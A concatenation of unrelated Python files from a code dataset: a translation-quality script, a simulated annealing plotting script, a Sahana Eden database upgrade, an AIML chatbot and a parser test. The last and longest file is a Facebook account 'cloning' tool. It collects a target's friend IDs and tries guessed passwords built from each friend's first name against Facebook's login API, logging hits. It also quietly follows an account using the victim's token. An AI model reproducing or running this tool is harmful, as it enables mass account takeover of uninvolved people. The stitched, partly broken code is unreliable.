del sendsnoopdevices[devicename]
| StarcoderdataPython |
155701 | from examples.wmt_2020.common.util.download import download_from_google_drive
from examples.wmt_2020.ro_en.transformer_nmt_config import MODEL_TYPE, transformer_nmt_config, DRIVE_FILE_ID, \
MODEL_NAME, GOOGLE_DRIVE, TEMP_DIRECTORY, RESULT_FILE
from transquest.algo.transformers.run_model import QuestModel
import torch
import tarfile
import urllib.request
import os
if not os.path.exists(TEMP_DIRECTORY):
os.makedirs(TEMP_DIRECTORY)
if GOOGLE_DRIVE:
download_from_google_drive(DRIVE_FILE_ID, MODEL_NAME)
urllib.request.urlretrieve ("https://www.quest.dcs.shef.ac.uk/wmt20_files_qe/training_ro-en.tar.gz", "training_ro-en.tar.gz")
model = QuestModel(MODEL_TYPE, MODEL_NAME, num_labels=1, use_cuda=torch.cuda.is_available(),
args=transformer_nmt_config)
tar = tarfile.open("training_ro-en.tar.gz", "r:gz")
tar.extractall()
tar.close()
with open('train.roen.ro') as f:
romanian_lines = f.read().splitlines()
with open('train.roen.en') as f:
english_lines = f.read().splitlines()
nmt_sentence_pairs = list(map(list, zip(romanian_lines[0:1000000], english_lines[0:1000000])))
predictions, raw_outputs = model.predict(nmt_sentence_pairs)
with open(os.path.join(TEMP_DIRECTORY, RESULT_FILE), "w") as f:
for s in predictions:
f.write(str(s) +"\n") | StarcoderdataPython |
3234494 | import numpy as np
import matplotlib
# matplotlib.use('module://matplotlib-backend-kitty')
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from zoo import Zoo
from sa import simulated_annealing
objectives = [Zoo().get('branin').make_explicit(),
Zoo().get('goldstein_price').make_explicit()]
NUM_RUNS = 4
GAMMA = 0.01
for obj in objectives:
f, grad = obj.f, obj.grad
domain, plt_domain = np.array(obj.domain), np.array(obj.domain_plot)
DOM_DIM = 2
L0 = 10
L = DOM_DIM * L0
DELTA = 0.1
EPS = 1e-4
CHI = 0.9
SMOOTHING = 0.01
T = 0.1
def callback(iteration, x, chain, c):
x_hist.extend(chain)
c_hist.append(c)
xlim = plt_domain[:, 0]
ylim = plt_domain[:, 1]
n_samples = 200
x_plt, y_plt = np.linspace(*xlim, n_samples), np.linspace(*ylim, n_samples)
mx, my = np.meshgrid(x_plt, y_plt)
z = np.power(f([mx, my]), 0.1)
fig, ax = plt.subplots(1, 1)
ax.contourf(x_plt, y_plt, z, levels=50, cmap='viridis')
colors = plt.cm.twilight(np.linspace(0, 1, NUM_RUNS + 1))
temps = list()
for idx_run in range(NUM_RUNS + 1):
c_hist = list()
x_hist = list()
res = simulated_annealing(f,
grad,
domain=domain,
l0=L0,
delta=DELTA,
stop_eps=EPS,
chi=CHI,
smoothing=SMOOTHING,
descent_affinity=T,
callback=callback)
x_smooth = res[0]
x_smooth_hist = [x_smooth, ]
temps.append(c_hist)
for x_i in reversed(x_hist):
x_smooth = GAMMA * x_i + (1. - GAMMA) * x_smooth
x_smooth_hist.append(x_smooth)
ax.scatter([res[0][0], ], [res[0][1], ], c=np.array(colors[idx_run]).reshape((1, 4)))
ax.plot(*tuple(zip(*x_smooth_hist)), color=colors[idx_run], linewidth=0.6)
ax.set_xlabel(r'$x_1$')
ax.set_ylabel(r'$x_2$')
fig.savefig(f'figures/fig51-{obj.name}.pdf', dpi=200)
fig, ax = plt.subplots(1, 1)
for c_hist in temps:
ax.plot(np.arange(len(c_hist)), c_hist)
ax.set_xlabel(r'Iteration $n$')
ax.set_ylabel(r'Temperature $c^{(n)}$')
fig.savefig(f'figures/fig52-{obj.name}.pdf', dpi=200)
| StarcoderdataPython |
1725659 | <reponame>nursix/STL
# -*- coding: utf-8 -*-
#
# Database upgrade script
#
# STL Template Version 2.1.3 => 2.1.4
#
# Execute in web2py folder after code upgrade like:
# python web2py.py -S eden -M -R applications/eden/modules/templates/STL/upgrade/2.1.3-2.1.4.py
#
#import datetime
import sys
#from s3 import S3DateTime
#from gluon.storage import Storage
#from gluon.tools import callback
# Override auth (disables all permission checks)
auth.override = True
# Failed-flag
failed = False
# Info
def info(msg):
print >> sys.stderr, msg,
def infoln(msg):
print >> sys.stderr, msg
# Load models for tables
atable = s3db.dvr_activity
utable = auth.settings.table_user
otable = s3db.org_organisation
IMPORT_XSLT_FOLDER = os.path.join(request.folder, "static", "formats", "s3csv")
TEMPLATE_FOLDER = os.path.join(request.folder, "modules", "templates", "STL")
# -----------------------------------------------------------------------------
if not failed:
info("Set owner organizations for group activities")
left = (utable.on(utable.id == atable.owned_by_user),
otable.on(otable.id == utable.organisation_id),
)
query = (atable.deleted == False)
rows = db(query).select(atable.id,
otable.id,
otable.pe_id,
left = left,
)
updated = 0
for row in rows:
organisation_id = row.org_organisation.id
if (organisation_id):
query = (atable.id == row.dvr_activity.id)
try:
success = db(query).update(organisation_id = organisation_id,
realm_entity = row.org_organisation.pe_id,
)
except:
pass
if success:
updated += 1
infoln("...done (%s records updated)" % updated)
# -----------------------------------------------------------------------------
if not failed:
info("Upgrade user roles")
bi = s3base.S3BulkImporter()
filename = os.path.join(TEMPLATE_FOLDER, "auth_roles.csv")
with open(filename, "r") as File:
try:
bi.import_role(filename)
except Exception, e:
infoln("...failed")
infoln(sys.exc_info()[1])
failed = True
else:
infoln("...done")
# -----------------------------------------------------------------------------
if not failed:
info("Hide unused user roles")
hidden = ("EDITOR", "MAP_ADMIN", "ORG_GROUP_ADMIN")
query = s3db.auth_group.uuid.belongs(hidden)
try:
db(query).update(hidden=True)
except:
infoln("...failed")
infoln(sys.exc_info()[1])
failed = True
else:
infoln("...done")
# -----------------------------------------------------------------------------
# Finishing up
#
if failed:
db.rollback()
print >> sys.stderr, "UPGRADE FAILED - Action rolled back."
else:
db.commit()
print >> sys.stderr, "UPGRADE SUCCESSFUL."
| StarcoderdataPython |
4820031 | import aiml
import sys
from bottle import run
from bottle import route
from bottle import request
from bottle import redirect
from random import choice
from lib.views import index
from lib.views import Response
botbrain = aiml.Kernel()
botbrain.learn('brain/yulan.aiml')
@route('/')
def RenderIndex():
return index()
@route('/answer', method='POST')
def ResponseAnswer():
ask = request.forms.get('ask')
if ask:
questions.append(ask)
try:
ans = botbrain.respond(ask)
except:
ans = choice(default_excuses)
ask_template = '<p> you just asked: {} </p>'.format(ask)
respond_template = '<p> her answer: {} </p>'.format(ans)
return ask_template, respond_template
redirect('http://localhost:8080/hello')
return "You asked nothing!"
run(host='localhost', port=sys.argv[1], debug=True)
| StarcoderdataPython |
3337009 | # -*- coding: utf-8 -*-
import unittest
import ddt
import cefp
@ddt.ddt
class TestCEF(unittest.TestCase):
@ddt.file_data('test_cefp.json')
def test_parse(self, input, expected):
if isinstance(expected, dict):
self.assertEqual(cefp.parse(input), expected)
else:
self.assertRaises(__builtins__[expected], cefp.parse, input)
| StarcoderdataPython |
81881 | #coding=utf-8
########################################
# <NAME>
# Cloning update 2020
########################################
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(100000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 paceusa.py')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def keluar():
print 'Selamat Tinggal Asw '
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.001)
#### colours ####
B='\033[1;94m'
R='\033[1;91m'
G='\033[1;92m'
W='\033[1;97m'
S='\033[1;96m'
P='\033[1;95m'
Y='\033[1;93m'
#Dev:Anonymous Pace Usa
#### LOGO ####
print """
\033[1;96m
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░░░░░████░░████░░░████░░░░░░░
░░░░░░░░████░░████░░░░░░░░░░░░░░
░░░░░░░░████░░████░░░████░░░░░░░
░░░░░░░░████▄▄████░░░████░░░░░░░
░░░░░░░░██████████░░░████░░░░░░░
░░░░░░░░████▀▀████░░░████░░░░░░░
░░░░░░░░████░░████░░░████░░░░░░░
░░░░░░░░████░░████░░░████░░░░░░░
░░░░░░░░████░░████░░░████░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░"""
print "\033[1;93m⊱⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⊰"
jalan("\033[1;93m███████▓█████▓▓╬╬╬╬╬╬╬╬▓███▓╬╬╬╬╬╬╬▓╬╬▓█ ")
jalan("\033[1;93m████▓▓▓▓╬╬▓█████╬╬╬╬╬╬███▓╬╬╬╬╬╬╬╬╬╬╬╬╬█ ")
jalan("\033[1;93m███▓▓▓▓╬╬╬╬╬╬▓██╬╬╬╬╬╬▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ")
jalan("\033[1;93m████▓▓▓╬╬╬╬╬╬╬▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ")
jalan("\033[1;93m███▓█▓███████▓▓███▓╬╬╬╬╬╬▓███████▓╬╬╬╬▓█ ")
jalan("\033[1;93m████████████████▓█▓╬╬╬╬╬▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬█ ")
jalan("\033[1;93m███▓▓▓▓▓▓▓╬╬▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ")
jalan("\033[1;93m████▓▓▓╬╬╬╬▓▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ")
jalan("\033[1;93m███▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ")
jalan("\033[1;93m█████▓▓▓▓▓▓▓▓█▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ")
jalan("\033[1;93m█████▓▓▓▓▓▓▓██▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██ ")
jalan("\033[1;93m█████▓▓▓▓▓████▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██ ")
jalan("\033[1;93m████▓█▓▓▓▓██▓▓▓▓██╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██ ")
jalan("\033[1;93m████▓▓███▓▓▓▓▓▓▓██▓╬╬╬╬╬╬╬╬╬╬╬╬█▓╬▓╬╬▓██ ")
jalan("\033[1;93m█████▓███▓▓▓▓▓▓▓▓████▓▓╬╬╬╬╬╬╬█▓╬╬╬╬╬▓██ ")
jalan("\033[1;93m█████▓▓█▓███▓▓▓████╬▓█▓▓╬╬╬▓▓█▓╬╬╬╬╬╬███ ")
jalan("\033[1;93m██████▓██▓███████▓╬╬╬▓▓╬▓▓██▓╬╬╬╬╬╬╬▓███ ")
jalan("\033[1;93m███████▓██▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬████ ")
jalan("\033[1;93m███████▓▓██▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓████ ")
jalan("\033[1;93m████████▓▓▓█████▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█████ ")
jalan("\033[1;93m█████████▓▓▓█▓▓▓▓▓███▓╬╬╬╬╬╬╬╬╬╬╬▓██████ ")
jalan("\033[1;93m██████████▓▓▓█▓▓▓╬▓██╬╬╬╬╬╬╬╬╬╬╬▓███████ ")
jalan("\033[1;93m███████████▓▓█▓▓▓▓███▓╬╬╬╬╬╬╬╬╬▓████████ ")
jalan("\033[1;93m██████████████▓▓▓███▓▓╬╬╬╬╬╬╬╬██████████ ")
jalan("\033[1;93m███████████████▓▓▓██▓▓╬╬╬╬╬╬▓███████████")
print "\033[1;93m⊱⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⊰"
logo = """
\033[1;91m ▒▒▒▒▒▒▒▒▒▒▒▄▄▄▄░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;91m ▒▒▒▒▒▒▒▒▒▄██████▒▒▒▒▒▄▄▄█▄▒▒▒▒▒▒▒▒▒▒
\033[1;91m ▒▒▒▒▒▒▒▄██▀░░▀██▄▒▒▒▒████████▄▒▒▒▒▒▒
\033[1;91m ▒▒▒▒▒▒███░░░░░░██▒▒▒▒▒▒█▀▀▀▀▀██▄▄▒▒▒
\033[1;91m ▒▒▒▒▒▄██▌░░░░░░░██▒▒▒▒▐▌▒▒▒▒▒▒▒▒▀█▄▒
\033[1;91m ▒▒▒▒▒███░░▐█░█▌░██▒▒▒▒█▌▒▒▒▒▒▒▒▒▒▒▀▌
\033[1;91m ▒▒▒▒████░▐█▌░▐█▌██▒▒▒██▒▒▒▒▒▒▒▒▒▒▒▒▒ \033[1;93m
\033[1;91m ▒▒▒▐████░▐░░░░░▌██▒▒▒█▌▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;91m ▒▒▒▒████░░░▄█░░░██▒▒▐█▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;91m ▒▒▒▒████░░░██░░██▌▒▒█▌▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;91m ▒▒▒▒████▌░▐█░░███▒▒▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;91m ▒▒▒▒▐████░░▌░███▒▒▒██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ▒▒▒▒▒████░░░███▒▒▒▒█▌▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ▒▒▒██████▌░████▒▒▒██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ▒▐████████████▒▒███▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ▒█████████████▄████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ██████████████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ██████████████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m █████████████████▀▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m █████████████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ████████████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m ████████████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
\033[1;97m╔═══════════════════════════════════════╗
\033[1;97m║\033[1;93m* \033[1;97mAUTHOR \033[1;91m: \033[1;96mPaceUsa \033[1;97m ║
\033[1;97m║\033[1;93m* \033[1;97mGITHUB \033[1;91m: \033[1;92mhttps://github.com/Ahmadchen\033[1;97m║
\033[1;97m║\033[1;93m* \033[1;97mFB \033[1;91m: \033[1;92mPACEUSA GANS ID Squad. \033[1;97m ║
\033[1;97m╚═══════════════════════════════════════╝
\033[1;96m⊱══════════⊱═⊰Anonymous Wibu⊱══════════⊱═⊰
"""
CorrectUsername = "PaceUsa"
CorrectPassword = "<PASSWORD>"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;97mKETIK PaceUsa \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;97mKETIK AnonymousID \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Salah Tolol! Ketik AnonymousID"
os.system('xdg-open https://www.t.me/cardingtutorialfreeindonesia')
else:
print "Salah Tolol! Ketik PaceUsa"
os.system('xdg-open https://www.facebook.com/cicicyber.squadindo.7')
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mMohon Tunggu \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
back = 0
threads = []
sucessful = []
checkpoint = []
oks = []
action_failed = []
idfriends = []
idfromfriends = []
member_id = []
email= []
number = []
id = []
em = []
email_from_friends = []
hp = []
hpfromfriends = []
reaction = []
reactiongroup = []
comment = []
group_comment = []
listgroup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### LICENSE #####
#=================#
def lisensi():
os.system('clear')
login()
####login#########
def login():
os.system('clear')
print logo
jalan("\033[1;97m⊱⋕⊰══════════════════════════════════════⊱⋕⊰")
print "\033[1;91m>>>\033[1;91m[1]\033[1;92m Cloning Semua Negara \033[1;91m(\033[1;97mTanpa Fb login\033[1;91m) "
time.sleep(0.05)
print "\033[1;91m>>>\033[1;91m[2]\033[1;94m Login Pakai Facebook "
time.sleep(0.05)
print "\033[1;91m>>>\033[1;91m[3]\033[1;92m Login Pakai Akses token "
time.sleep(0.05)
print "\033[1;91m>>>\033[1;91m[4]\033[1;94m Unduh Akses token"
time.sleep(0.05)
print "\033[1;91m>>>\033[1;91m[5]\033[1;92m Ikuti Fb Saya"
time.sleep(0.05)
print "\033[1;91m>>>\033[1;91m[6]\033[1;94m Follow Ig Saya"
time.sleep(0.05)
print "\033[1;91m>>>\033[1;91m[0]\033[1;96m Keluar "
jalan("\033[1;97m⊱⋕⊰══════════════════════════════════════⊱⋕⊰")
pilih_login()
def pilih_login():
peak = raw_input("\n\033[1;92mPilih Nomer═╬══►\033[1;95m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_login()
elif peak =="1":
menu()
elif peak =="2":
login1()
elif peak =="3":
tokenz()
elif peak =="4":
os.system('xdg-open https://play.google.com/store/apps/details?id=com.proit.thaison.getaccesstokenfacebook')
login()
elif peak =="5":
os.system('xdg-open https://www.facebook.com/cicicyber.squadindo.7')
login()
elif peak =="6":
os.system('xdg-open https://Instagram.com/cyber_mrlinkerrorsystemoffical')
login()
elif unikers =="0":
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def login1():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
time.sleep(0.05)
print logo
jalan("\033[1;96m⊱⋕⊰══════════════════════════════════════⊱⋕⊰")
jalan('\033[1;96m[✾]\x1b[1;91mJANGAN GUNAKAN AKUN OLD UNTUK LOGIN\x1b[1;96m[✾]' )
jalan('\033[1;96m[✾]\x1b[1;91mGUNAKAN AKUN BARU BUAT/LOGIN FIA TOKEN\x1b[1;96m[✾]' )
id = raw_input('\033[1;96m[!!] \x1b[0;34mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[!!] \x1b[0;34mPassword \x1b[1;91m: \x1b[1;92m')
jalan("\033[1;96m⊱⋕⊰══════════════════════════════════════⊱⋕⊰")
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\x1b[1;97mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = <PASSWORD>
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"<KEY>","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":<PASSWORD>,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
jalan( '\n\x1b[1;95mLogin Successful...')
os.system('xdg-open https://www.facebook.com/cicicyber.squadindo.7')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\x1b[1;97mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\x1b[1;97mSepertinya Akun Anda Terkena Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\x1b[1;93mPassword/Email Anda Salah")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def tokenz():
os.system('clear')
print logo
toket = raw_input("\033[1;91m[+]\033[1;92mToken\033[1;91m :\033[1;95mMasukkan tautan token accees tanpa login Fb>> ")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Salah"
e = raw_input("\033[1;91m[?] \033[1;92mAnda Tau token? Kalo Tidak Tau Pm Saya!\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\x1b[1;94mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
o = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(o.text)
nama = a['name']
id = a['id']
t = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(t.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;97mSepertinya Akun Anda Terkena Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\x1b[1;94mThere is no internet connection"
keluar()
os.system("clear")
print logo
jalan( "\033[1;93m⊱⋕⊰═════════════════════════════════════════⊱⋕⊰" )
print " \033[1;36;40m\033[1;32;40m[*] Name\033[1;32;40m: "+nama+" \033[1;36;40m"
print " \033[1;36;40m\033[1;32;40m[*] ID \033[1;32;40m: "+id+" \033[1;36;92m"
print " \033[1;36;40m\033[1;32;40m[*] Subs\033[1;32;40m: "+sub+" \033[1;36;92m"
jalan( "\033[1;93m⊱⋕⊰═════════════════════════════════════════⊱⋕⊰")
print "\033[1;32;98m[1] \033[1;96m>> Mulai Cloning "
print "\033[1;32;98m[0] \033[1;96m>> Keluar"
pilih()
def pilih():
unikers = raw_input("\n\033[1;31;40m>>> \033[1;35;40m")
if unikers =="":
print "\x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
os.system('clear')
print logo
print "\033[1;96m⊱⋕⊰══════════════════════════════════════════⊱⋕⊰\n"
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\033[1;96m⊱⋕⊰══════════════════════════════════════════⊱⋕⊰\n"
jalan( "\x1b[1;32;92m[1] \033[1;33;98m>> Hack Daftar Teman Publik")
jalan( "\x1b[1;32;36m[0] \033[1;33;96m>> Keluar")
print "\033[1;96m⊱⋕⊰══════════════════════════════════════════⊱⋕⊰\n"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;31;40m>>> \033[1;97m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print "\033[1;96m⊱⋕⊰═══════════════════════════════════════⊱⋕⊰\n"
idt = raw_input("\033[1;96m[⊱⋕⊰]\033[1;93m Enter ID/USERNAME\033[1;91m : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;31;37m[⊱⋕⊰] Name : "+op["name"]
except KeyError:
print"\x1b[1;37m[⊱⋕⊰] ID Not Found!"
raw_input("\n\033[1;96m[\033[1;94mBack\033[1;96m]")
super()
print"\033[1;35;37m[⊱⋕⊰] Jangan Dulu Keluar Peler Lagi Proses... "
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="0":
menu()
else:
print "\x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;36;96m[⊱⋕⊰] Total ID : \033[1;92m"+str(len(id))
jalan('\033[1;34;96m[⊱⋕⊰] Mohon Tunggu ')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;32;40m[⊱⋕⊰] Cloning\033[1;93m"+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;94m ❈ \x1b[1;91mTo Stop Process Press CTRL+Z \033[1;94m ❈"
print "\033[1;96m⊱⋕⊰══════════════════════════════════════════⊱⋕⊰"
def main(arg):
global oks
user = arg
try:
os.mkdir('out')
except OSError:
pass #Dev:Yayan-XD
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'<PASSWORD>'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(<PASSWORD>)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;58m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;58m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'<PASSWORD>'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(<PASSWORD>)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;58m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;12m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '<PASSWORD>'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(<PASSWORD>)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;58m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;58m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = b['first_name'] + '<PASSWORD>'
